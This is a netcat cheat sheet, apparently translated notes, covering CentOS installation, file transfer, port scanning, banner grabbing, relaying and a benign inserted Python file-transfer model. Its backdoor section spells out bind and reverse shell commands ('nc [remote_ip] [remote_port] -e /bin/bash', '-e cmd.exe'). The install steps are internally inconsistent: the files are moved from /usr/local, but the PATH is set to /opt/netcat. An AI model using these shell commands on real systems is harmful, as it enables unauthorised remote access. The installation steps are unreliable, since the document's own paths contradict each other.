CentOS 7: download nc
wget https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz
Extract: tar -zxvf netcat-0.7.1.tar.gz
cd /usr/local
mv netcat-0.7.1 netcat
cd /usr/local/netcat
./configure
Compile: make
Install: make install
Configure the environment: vim /etc/profile
Add the following:
# set netcat path
export NETCAT_HOME=/opt/netcat
export PATH=$PATH:$NETCAT_HOME/bin
Save, exit, and make the configuration take effect:
source /etc/profile
Test:
nc -help (the help text is printed if the install succeeded)
base64 conversion
In the terminal, run base64 and type the value you want converted:
base64
dangtianpeng
Press Enter, then Ctrl+D to obtain the encoded output.
TCP/IP based usage (client/server model)
The server transmits data to the client
Forwarding information:
Create the server side:
nc -l -p [localPort]
nc -l -p 333 (server ip: 1.1.1.1)
Create the client side (connects to the server):
nc [remote_addr] [remoteport]
nc -nv 1.1.1.1 333
Returning a shell
Create the server side:
nc -l -p [localPort] -e cmd.exe
Create the client side (connects to the server):
nc [remote_addr] [remoteport]
nc transmits data over the standard input and output streams, so it can be driven directly from the command line.
File transfer:
Create the server side (the server receives the file):
nc -l -p [localPort] > outfile.txt
nc -l -p 333 > outfile.txt
Create the client side (sends the file):
nc [remote_addr] [remoteport] < /root/Desktop/flag.txt
If the server is not yet listening when the client uses nc to connect, the client will wait indefinitely until the server becomes reachable, leaving it in a kind of "suspended animation" state.
Solution: set a wait time
nc -w3 [ip] [port]  sets the wait time to 3 seconds; after 3 seconds the client closes the connection
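A Python model of the receiver/sender pair above and of what -w adds, included here as an added illustration (it is not nc itself and not part of the original notes); it assumes localhost, an OS-chosen port and a constructed payload in place of flag.txt.

```python
import socket
import threading

# Added model of the nc file-transfer pair above (nc -l -p PORT > outfile.txt on the
# receiver, nc -w3 HOST PORT < infile on the sender); every wait has a -w style timeout.

def listen(timeout=5.0):
    """nc -l -p PORT: bind an ephemeral 127.0.0.1 port; returns (listening socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    srv.listen(1)
    srv.settimeout(timeout)     # do not wait forever for a client to show up
    return srv, srv.getsockname()[1]

def receive_all(srv, timeout=5.0):
    """Accept one client and read until it closes; EOF is how `nc < file` ends the transfer."""
    with srv:
        conn, _ = srv.accept()
        conn.settimeout(timeout)  # nor for a client that connects but goes quiet
        with conn:
            chunks = []
            while True:
                data = conn.recv(4096)
                if not data:      # peer closed: the whole "file" has arrived
                    return b"".join(chunks)
                chunks.append(data)

def send_bytes(host, port, payload, timeout=3.0):
    """nc -w3 HOST PORT < file: connect, push the bytes, close to signal EOF."""
    with socket.create_connection((host, port), timeout=timeout) as c:
        c.sendall(payload)
    return len(payload)

def transfer(payload, timeout=3.0):
    """One receiver/sender exchange on localhost; returns (bytes sent, bytes received)."""
    srv, port = listen(timeout)
    got = {}
    t = threading.Thread(target=lambda: got.update(data=receive_all(srv, timeout)), daemon=True)
    t.start()
    sent = send_bytes("127.0.0.1", port, payload, timeout)
    t.join(timeout + 1)
    return sent, got.get("data")

def wait_for_reply(host, port, timeout=1.0):
    """What -w buys: give up after `timeout` seconds on a peer that never answers."""
    with socket.create_connection((host, port), timeout=timeout) as c:
        try:
            return c.recv(16)   # peer sends nothing; with no timeout this blocks forever
        except socket.timeout:
            return None
```

Calling transfer() shows the file-sized payload arriving intact; wait_for_reply() against a listener that never answers returns None after the timeout instead of hanging.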
netcat information gathering
- Target network scanning
- Simple probing of a target port
- Grabbing the target's service banner
Port scanning:
nc -v -n -z -w1 [target_ip] [start_target_port-stop_target_port]
-v verbose error output
-n do not resolve the target through DNS
-z zero-I/O mode, intended for port scanning: the packets sent to the target carry no payload, which speeds up the scan
-w1 timeout of 1 second
Banner grabbing:
echo "" | nc -v -n -w1 [target_ip] [start_target_port-stop_target_port]
Obtaining command execution on the target
Windows backdoor methods:
- Listening backdoor
nc -l -p 4444 -e cmd.exe
- Connecting backdoor
nc [remote_ip] [remote_port] -e cmd.exe
Linux backdoor methods:
1. Listening backdoor:
nc -l -p 4444 -e /bin/bash
2. Connecting backdoor:
nc [remote_ip] [remote_port] -e /bin/bash
Command-line parameters
-h  show the help for the parameters
-d  detach from the command window and run in the background
-e  execute a program after connecting (used to establish a backdoor)
-G  set the gateway; used to get past network restrictions
-g  routing hops
-i  set the interval between each line of data sent
-l  put netcat in listening mode, waiting for a connection
-L  put netcat in listening mode and, when the client disconnects, return to listening for the next connection
-n  treat the address as a numeric IP only; no DNS resolution
-o  hex-dump the transferred data
-p  set the local listening port number
-r  randomize the port numbers
-s  set the source address netcat uses
-t  answer telnet negotiation requests
-u  use UDP mode (netcat defaults to TCP)
-v  display error messages (verbose)
-w  connection timeout in seconds
-z  scan mode: the packets sent carry no payload
Connection forwarding
Used to get around connection limits in certain special circumstances.
echo nc [target] [port] > delay.bat
nc -l -p [localPort] -e delay.bat
When a client connects to the listening port, delay.bat runs and opens a connection to the target, so the client's connection is forwarded to the target server through that port.